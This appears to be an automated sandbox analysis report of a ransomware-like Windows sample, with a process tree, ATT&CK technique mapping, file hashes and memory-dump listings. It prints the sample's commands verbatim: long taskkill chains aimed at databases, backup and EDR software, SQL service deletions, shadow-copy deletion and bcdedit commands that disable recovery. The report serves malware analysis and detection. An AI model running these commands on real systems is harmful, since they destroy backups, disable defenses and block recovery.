@taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F"
3⤵
PID:712

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM ThunderPlatform.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4956

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM iexplore.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:32

C:\Windows\SysWOW64\cmd.exe
cmd /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill /IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM usysdiag.exe /F & @taskkill /IM PopBlock.exe /F & @taskkill /IM gsinterface.exe /F & @taskkill /IM Gemstar.Group.CRS.Client.exe /F & @taskkill /IM TenpayServer.exe /F & @taskkill /IM RemoteExecService.exe /F & @taskkill /IM VS_TrueCorsManager.exe /F & @taskkill /IM ntpsvr-2019-01-22-wgs84.exe /F & @taskkill /IM rtkjob-ion.exe /F & @taskkill /IM ntpsvr-2019-01-22-no-usrcheck.exe /F & @taskkill /IM NtripCaster-2019-01-08.exe /F & @taskkill /IM BACSTray.exe /F & @taskkill /IM protect.exe /F & @taskkill /IM hfs.exe /F & @taskkill /IM jzmis.exe /F & @taskkill /IM NewFileTime_x64.exe /F & @taskkill /IM 2345MiniPage.exe /F & @taskkill /IM JMJ_server.exe /F & @taskkill /IM cacls.exe /F & @taskkill /IM gpsdaemon.exe /F & @taskkill /IM gpsusersvr.exe /F & @taskkill /IM gpsdownsvr.exe /F & @taskkill /IM gpsstoragesvr.exe /F & @taskkill /IM gpsdataprocsvr.exe /F & @taskkill /IM gpsftpd.exe /F & @taskkill /IM gpsmysqld.exe /F & @taskkill /IM gpstomcat6.exe /F & @taskkill /IM gpsloginsvr.exe /F & @taskkill /IM gpsmediasvr.exe /F & @taskkill /IM gpsgatewaysvr.exe /F & @taskkill /IM gpssvrctrl.exe /F & @taskkill /IM zabbix_agentd.exe /F"
3⤵
PID:4896

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM pg_ctl.exe /F
4⤵
- Kills process with taskkill
PID:1160

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM rcrelay.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4968

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM SogouImeBroker.exe /F
4⤵
- Kills process with taskkill
PID:2252

C:\Windows\SysWOW64\cmd.exe
cmd /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill /IM benetns.exe /F & @taskkill /IM beserver.exe /F & @taskkill /IM pvlsvr.exe /F & @taskkill /IM bedbg.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM RemoteAssistProcess.exe /F & @taskkill /IM BarMoniService.exe /F & @taskkill /IM GoodGameSrv.exe /F & @taskkill /IM BarCMService.exe /F & @taskkill /IM TsService.exe /F & @taskkill /IM GoodGame.exe /F & @taskkill /IM BarServerView.exe /F & @taskkill /IM IcafeServicesTray.exe /F & @taskkill /IM BsAgent_0.exe /F & @taskkill /IM ControlServer.exe /F & @taskkill /IM DisklessServer.exe /F & @taskkill /IM DumpServer.exe /F & @taskkill /IM NetDiskServer.exe /F & @taskkill /IM PersonUDisk.exe /F & @taskkill /IM service_agent.exe /F & @taskkill /IM SoftMemory.exe /F & @taskkill /IM BarServer.exe /F & @taskkill /IM RtkNGUI64.exe /F & @taskkill /IM Serv-U-Tray.exe /F & @taskkill /IM QQPCSoftTrayTips.exe /F & @taskkill /IM SohuNews.exe /F & @taskkill /IM Serv-U.exe /F & @taskkill /IM QQPCRTP.exe /F & @taskkill /IM EasyFZS.exe /F & @taskkill /IM HaoYiShi.exe /F & @taskkill /IM HysMySQL.exe /F & @taskkill /IM wtautoreg.exe /F & @taskkill /IM ispiritPro.exe /F & @taskkill /IM CAService.exe /F & @taskkill /IM XAssistant.exe /F & @taskkill /IM TrustCA.exe /F & @taskkill /IM GEUU20003.exe /F & @taskkill /IM CertMgr.exe /F & @taskkill /IM eSafe_monitor.exe /F & @taskkill /IM MainExecute.exe /F & @taskkill /IM FastInvoice.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM sesvc.exe /F & @taskkill /IM ScanFileServer.exe /F & @taskkill /IM Nuoadehgcgcd.exe /F & @taskkill /IM OpenFastAssist.exe /F & @taskkill /IM FastInvoiceAssist.exe /F & @taskkill /IM Nuoadfaggcje.exe /F & @taskkill /IM OfficeUpdate.exe /F & @taskkill /IM atkexComSvc.exe /F & @taskkill /IM FileTransferAgent.exe /F & @taskkill /IM MasterReplicatorAgent.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmUnzipService.exe /F & @taskkill /IM NscAuthService.exe /F & @taskkill /IM ReplicaReplicatorAgent.exe /F & @taskkill /IM ASMCUSvc.exe /F & @taskkill /IM OcsAppServerHost.exe /F & @taskkill /IM RtcCdr.exe /F & @taskkill /IM IMMCUSvc.exe /F & @taskkill /IM DataMCUSvc.exe /F & @taskkill /IM MeetingMCUSvc.exe /F & @taskkill /IM QmsSvc.exe /F & @taskkill /IM RTCSrv.exe /F & @taskkill /IM pnopagw.exe /F & @taskkill /IM NscAuth.exe /F & @taskkill /IM Microsoft.ActiveDirectory.WebServices.exe /F & @taskkill /IM DistributedCacheService.exe /F & @taskkill /IM c2wtshost.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Calculation.exe /F & @taskkill /IM schedengine.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Eventing.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Queuing.exe /F & @taskkill /IM WSSADMIN.EXE /F & @taskkill /IM hostcontrollerservice.exe /F & @taskkill /IM noderunner.exe /F & @taskkill /IM OWSTIMER.EXE /F & @taskkill /IM wsstracing.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM MySQLInstallerConsole.exe /F & @taskkill /IM EXCEL.EXE /F & @taskkill /IM consent.exe /F & @taskkill /IM RtkAudioService64.exe /F & @taskkill /IM RAVBg64.exe /F & @taskkill /IM FNPLicensingService64.exe /F & @taskkill /IM VisualSVNServer.exe /F & @taskkill /IM MotionBoard57.exe /F & @taskkill /IM MotionBoardRCService57.exe /F & @taskkill /IM LPManService.exe /F & @taskkill /IM RaRegistry.exe /F & @taskkill /IM RaAutoInstSrv.exe /F & @taskkill /IM RtHDVCpl.exe /F & @taskkill /IM DefenderDaemon.exe /F & @taskkill /IM BestSyncApp.exe /F & @taskkill /IM ApUI.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM LPManNotifier.exe /F & @taskkill /IM FieldAnalyst.exe /F & @taskkill /IM TimingGenerate.exe /F & @taskkill /IM Detector.exe /F & @taskkill /IM Estimator.exe /F & @taskkill /IM FA_Logwriter.exe /F & @taskkill /IM TrackingSrv.exe /F & @taskkill /IM cbInterface.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM ccbService.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM dbsrv16.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM KICManager.exe /F & @taskkill /IM KICMain.exe /F & @taskkill /IM ServerManagerLauncher.exe /F & @taskkill /IM TbossGate.exe /F & @taskkill /IM iusb3mon.exe /F & @taskkill /IM MgrEnvSvc.exe /F & @taskkill /IM Mysoft.Config.WindowsService.exe /F & @taskkill /IM Mysoft.UpgradeService.UpdateService.exe /F & @taskkill /IM hasplms.exe /F & @taskkill /IM Mysoft.Setup.InstallService.exe /F & @taskkill /IM Mysoft.UpgradeService.Dispatcher.exe /F & @taskkill /IM Mysoft.DataCenterService.WindowsHost.exe /F & @taskkill /IM Mysoft.DataCenterService.DataCleaning.exe /F & @taskkill /IM Mysoft.DataCenterService.DataTracking.exe /F & @taskkill /IM Mysoft.SchedulingService.WindowsHost.exe /F & @taskkill /IM ServiceMonitor.exe /F & @taskkill /IM Mysoft.SchedulingService.ExecuteEngine.exe /F & @taskkill /IM AgentX.exe /F & @taskkill /IM host.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM vsjitdebugger.exe /F"
3⤵
PID:2756

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM BackupExec.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4196

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Att.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4632

C:\Windows\SysWOW64\cmd.exe
cmd /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @taskkill /IM tv_w32.exe /F & @taskkill /IM tv_x64.exe /F & @taskkill /IM rdm.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM SecureCRTPortable.exe /F & @taskkill /IM VirtualBox.exe /F & @taskkill /IM VBoxSVC.exe /F & @taskkill /IM VirtualBoxVM.exe /F & @taskkill /IM abs_deployer.exe /F & @taskkill /IM edr_monitor.exe /F & @taskkill /IM sfupdatemgr.exe /F & @taskkill /IM ipc_proxy.exe /F & @taskkill /IM edr_agent.exe /F & @taskkill /IM edr_sec_plan.exe /F & @taskkill /IM sfavsvc.exe /F & @taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F & @taskkill /IM DataShareBox.ShareBoxService.exe /F & @taskkill /IM Jointsky.CloudExchangeService.exe /F & @taskkill /IM Jointsky.CloudExchange.NodeService.ein /F & @taskkill /IM perl.exe /F & @taskkill /IM java.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM TsServer.exe /F & @taskkill /IM AppMain.exe /F & @taskkill /IM easservice.exe /F & @taskkill /IM Kingdee6.1.exe /F & @taskkill /IM QyKernel.exe /F & @taskkill /IM QyFragment.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM ComputerZTray.exe /F & @taskkill /IM ComputerZService.exe /F & @taskkill /IM ClearCache.exe /F & @taskkill /IM ProLiantMonitor.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM bugreport.exe /F & @taskkill /IM GNWebServer.exe /F & @taskkill /IM UI0Detect.exe /F & @taskkill /IM GNCore.exe /F & @taskkill /IM gnwayDDNS.exe /F & @taskkill /IM GNWebHelper.exe /F & @taskkill /IM php-cgi.exe /F & @taskkill /IM ESLUSBService.exe /F & @taskkill /IM CQA.exe /F & @taskkill /IM Kekcoek.pif /F & @taskkill /IM Tinuknx.exe /F & @taskkill /IM servers.exe /F & @taskkill /IM ping.exe /F & @taskkill /IM TianHeng.exe /F & @taskkill /IM K3MobileService.exe /F & @taskkill /IM VSSVC.exe /F & @taskkill /IM Xshell.exe /F & @taskkill /IM XshellCore.exe /F & @taskkill /IM FNPLicensingService.exe /F & @taskkill /IM XYNTService.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM EISService.exe /F & @taskkill /IM UFSoft.U8.Framework.EncryptManager.exe /F & @taskkill /IM yonyou.u8.gc.taskmanager.servicebus.exe /F & @taskkill /IM U8KeyManagePool.exe /F & @taskkill /IM U8MPool.exe /F & @taskkill /IM U8SCMPool.exe /F & @taskkill /IM UFIDA.U8.Report.SLReportService.exe /F & @taskkill /IM U8TaskService.exe /F & @taskkill /IM U8TaskWorker.exe /F & @taskkill /IM U8WebPool.exe /F & @taskkill /IM U8AllAuthServer.exe /F & @taskkill /IM UFIDA.U8.UAP.ReportService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.Services.exe /F & @taskkill /IM U8WorkerService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.exe /F & @taskkill /IM ShellStub.exe /F & @taskkill /IM U8UpLoadTask.exe /F & @taskkill /IM UfSysHostingService.exe /F & @taskkill /IM UFIDA.UBF.SystemManage.ApplicationService.exe /F & @taskkill /IM UFIDA.U9.CS.Collaboration.MailService.exe /F & @taskkill /IM NotificationService.exe /F & @taskkill /IM UBFdevenv.exe /F & @taskkill /IM UFIDA.U9.SystemManage.SystemManagerClient.exe /F & @taskkill /IM mongod.exe /F & @taskkill /IM SpusCss.exe /F & @taskkill /IM UUDesktop.exe /F & @taskkill /IM KDHRServices.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.Mobile.Servics.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM KDSvrMgrService.exe /F & @taskkill /IM pdfServer.exe /F & @taskkill /IM pdfspeedup.exe /F & @taskkill /IM SufAppServer.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.K3.Mobile.LightPushService.exe /F & @taskkill /IM iMTSSvcMgr.exe /F & @taskkill /IM kdmain.exe /F & @taskkill /IM KDActMGr.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM K3ServiceUpdater.exe /F & @taskkill /IM Aua.exe /F & @taskkill /IM iNethinkSQLBackup.exe /F & @taskkill /IM auaJW.exe /F & @taskkill /IM Scheduler.exe /F & @taskkill /IM bschJW.exe /F & @taskkill /IM SystemTray64.exe /F & @taskkill /IM OfficeDaemon.exe /F & @taskkill /IM OfficeIndex.exe /F & @taskkill /IM OfficeIm.exe /F & @taskkill /IM iNethinkSQLBackupConsole.exe /F & @taskkill /IM OfficeMail.exe /F & @taskkill /IM OfficeTask.exe /F & @taskkill /IM OfficePOP3.exe /F & @taskkill /IM apache.exe /F & @taskkill /IM GnHostService.exe /F /T & @taskkill /IM HwUVPUpgrade.exe /F /T & @taskkill /IM "Kingdee.KIS.UESystemSer.exe" /F /T & @taskkill /IM uvpmonitor.exe /F /T & @taskkill /IM UVPUpgradeService.exe /F /T & @taskkill /IM KDdataUpdate.exe /F /T & @taskkill /IM Portal.exe /F /T & @taskkill /IM U8SMSSrv.exe /F /T & @taskkill /IM "Ufida.T.SM.PublishService.exe" /F /T & @taskkill /IM lta8.exe /F /T & @taskkill /IM UfSvrMgr.exe /F /T & @taskkill /IM AutoUpdateService.exe /F /T & @taskkill /IM MOM.exe /F /T"
3⤵
PID:776

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM VBoxSDS.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1208

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM mysqld.exe /F
4⤵
- Kills process with taskkill
PID:4032

C:\Users\Admin\AppData\Local\Temp\a-Yaoofdkgd.exe
C:\Users\Admin\AppData\Local\Temp\a-Yaoofdkgd.exe
2⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3864

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4492

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLFDLauncher"
4⤵
- Launches sc.exe
PID:1316

C:\Windows\System32\vssadmin.exe
"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:4008

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
3⤵
PID:4784

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
3⤵
PID:4720

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2272

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3028

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Wfhvyrkill$-arab.bat

Filesize
53KB

MD5
b57545cb36ef6a19fdde4b2208ebb225

SHA1
1d319740835ff12562e04cc74545a047bba63031

SHA256
445d709ea4ae38706a0cc47ffc6c100fb9a354ff1ac718d0c23415524bdfc895

SHA512
3618bb17282d8d82ff280590563eebd5c0b181d24156f6a69cba53d17a1bae0d9287c9f191efbe6c3d4223bcb47348c74177000aa0844263ed176df56e1f0856

Download Submit
memory/160-395-0x0000000000000000-mapping.dmp

Download
memory/328-863-0x0000000000000000-mapping.dmp

Download
memory/528-658-0x0000000000000000-mapping.dmp

Download
memory/820-295-0x0000000000000000-mapping.dmp

Download
memory/1100-535-0x0000000000000000-mapping.dmp

Download
memory/1244-534-0x0000000000000000-mapping.dmp

Download
memory/1260-882-0x0000000000000000-mapping.dmp

Download
memory/1316-418-0x0000000000000000-mapping.dmp

Download
memory/1320-743-0x0000000000000000-mapping.dmp

Download
memory/1416-697-0x0000000000000000-mapping.dmp

Download
memory/1440-783-0x0000000000000000-mapping.dmp

Download
memory/1528-416-0x0000000000000000-mapping.dmp

Download
memory/1536-510-0x0000000000000000-mapping.dmp

Download
memory/1832-638-0x0000000000000000-mapping.dmp

Download
memory/1840-188-0x0000000005EF0000-0x00000000063EE000-memory.dmp

Filesize
5.0MB

Download
memory/1840-134-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-135-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-136-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-137-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-138-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-139-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-140-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-141-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-142-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-143-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-144-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-145-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-146-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-147-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-148-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-149-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-150-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-151-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-152-0x0000000000610000-0x0000000000618000-memory.dmp

Filesize
32KB

Download
memory/1840-153-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-154-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-155-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-156-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-157-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-158-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
memory/1840-159-0x0000000077390000-0x000000007751E000-memory.dmp

Filesize
1.6MB

Download
